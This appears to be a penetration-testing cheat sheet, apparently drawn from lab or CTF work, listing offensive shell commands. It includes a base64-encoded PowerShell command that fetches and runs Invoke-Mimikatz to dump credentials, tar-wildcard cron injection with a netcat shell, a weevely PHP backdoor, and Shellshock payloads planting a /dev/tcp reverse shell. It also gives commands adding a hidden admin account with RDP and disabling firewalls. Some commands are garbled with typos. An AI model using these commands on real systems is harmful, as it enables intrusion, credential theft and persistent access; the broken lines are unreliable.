# Tricks ## Reverse Shell Tricks ### Spawning a TTY Shell ```bash python -c 'import pty; pty.spawn("/bin/sh")' ``` ```bash echo os.system('/bin/bash') ``` ```bash /bin/sh -i ``` ```bash perl —e 'exec "/bin/sh";' ``` ```bash perl: exec "/bin/sh"; ``` ```bash ruby: exec "/bin/sh" ``` ```bash lua: os.execute('/bin/sh') ``` From within IRB ```bash exec "/bin/sh" ``` From within vi ```bash :!bash ``` From within vi ```bash :set shell=/bin/bash:shell ``` From within nmap ```bash !sh ``` ### Double characters Getting double characters (which is annoying)? You can clean that up with: ```bash stty raw -echo ``` ### Shell upgrade How to get a fully functional shell: * Get a tty shell, e.g.,: ```bash python -c "import pty;pty.spawn('/bin/bash')" ``` * Upgrade shell to a tty: ```bash SHELL=/bin/bash script -q /dev/null ``` * Set terminal: ```bash export TERM=xterm-256color ``` * Switch to the background with CTRL+Z. * Configure local shell: ```bash stty raw -echo ``` * Change to the foreground with ```bash fg ``` * Reset the tty with ```bash reset ``` No we have a fully functional shell. CTRL+C terminates the remote process, not the local nc, anymore. ## PowerShell Tricks ### Invoke-Mimikatz ```bash cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzADsA" ``` The decoded base64 is: ```bash IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; ``` ## Ubuntu disable firewall ```bash sudo ufw disable ``` ## Cron job Depending on how your linux system is set up, you can look in: ```bash /var/spool/cron/* (user crontabs) /etc/crontab (system-wide crontab) ``` also, many distros have: ```bash /etc/cron.d/* These configurations have the same syntax as /etc/crontab /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly ``` These are simply directories that contain executables that are executed hourly, daily, weekly or monthly, per their directory name. On top of that, you can have at jobs (check /var/spool/at/*), anacron (/etc/anacrontab and /var/spool/anacron/*) ```bash cat /etc/crontab cat /etc/cron.daily/backup ``` 1. ```bash echo "mkfifo /tmp/she; nc 127.0.0.1 9999 0 /tml/she 2>&1; tm /tmp/she" > shell.sh && chmod +x shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 ``` ```bash nc -lvnp 9999 ``` 2. ```bash ls /etc/cron.daily ``` ### Cron file Append ```bash echo 'rm -rf /tmp/p; mknod /tmp/p p; /bin/bash 0/tmp/p' >> /tab/script.sh ``` ## Search for interesting files ```bash find / -name ".*" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null ``` ```bash find -name ".bash_history" -path "/home/*" -exec cat {} \; ``` ```bash find / -user USERtoUSE 2>/dev/null ``` Look for files owned by root that we could write to. To reduce false positives, only look for files (not symlinks) and exclude proc, which is full of root-owned writable files. ```bash find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null ``` ### SUID ```bash find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; ``` ```bash find / -type f -perm -/o+w 2>/dev/null | grep -Ev '(proc|sys|www)' ``` ## weevely ```bash weevely generate mysecret ~/Desktop/mydoor.php ``` ```bash weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mahsecret ls weevely http://192.168.56.101/imfadministrator/uploads/mydoor.php mahsecret ``` ## Port knocking with nc ```bash nc -z 192.168.110.101 7000 8000 9000; ``` ## Shellshock ```bash ssh -i noob noob@192.168.40.132 '() { :;}; /bin/bash' wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/id" http://sokar:591/cgi-bin/cat ; cat cat curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://172.16.66.137:591/cgi-bin/cat egress filter User-Agent: () { :;};echo;/bin/echo '/bin/bash -i >& /dev/tcp/192.168.221.139/51242 0>&1 ' > /home/bynarr/.profile; ``` ## Quick add Admin and RDP ```bash net user /add caiom MySecurePassword158! ``` ``` net localgroup administrators caiom /add ``` To start up the Remote Desktop (RDP) service. ```bash reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 ``` Configure the firewall to let RDP connections in. ```bash netsh firewall set service remoteadmin enable ``` ```bash netsh firewall set service remotedesktop enable ``` Now use rdesktop on Kali to log in to your newly minted account. ```bash rdesktop ``` ### Nmap list all scripts ```bash ls -l /usr/share/nmap/scripts/smb* ``` ## Forward traffic from a laptop's wlan0 to eth0 **PC** Specify an IP address to eth0 (here 192.168.56.1) ```bash ifconfig eth0 192.168.56.1 netmask 255.255.255.0 ``` Enable IP forwarding ```bash sysctl -w net.ipv4.ip_forward=1 ``` Forward packets from eth0 to wlan0 ```bash iptables -A FORWARD --in-interface eth0 -j ACCEPT ``` ```bash iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE ``` **Device connected to PC** Setup IP address for eth0,and add gateway ```bash ifconfig eth0 192.168.56.2 netmask 255.255.255.0 ``` ```bash route add default gw 192.168.56.1 ``` ## Kudos, References and Further Reading * *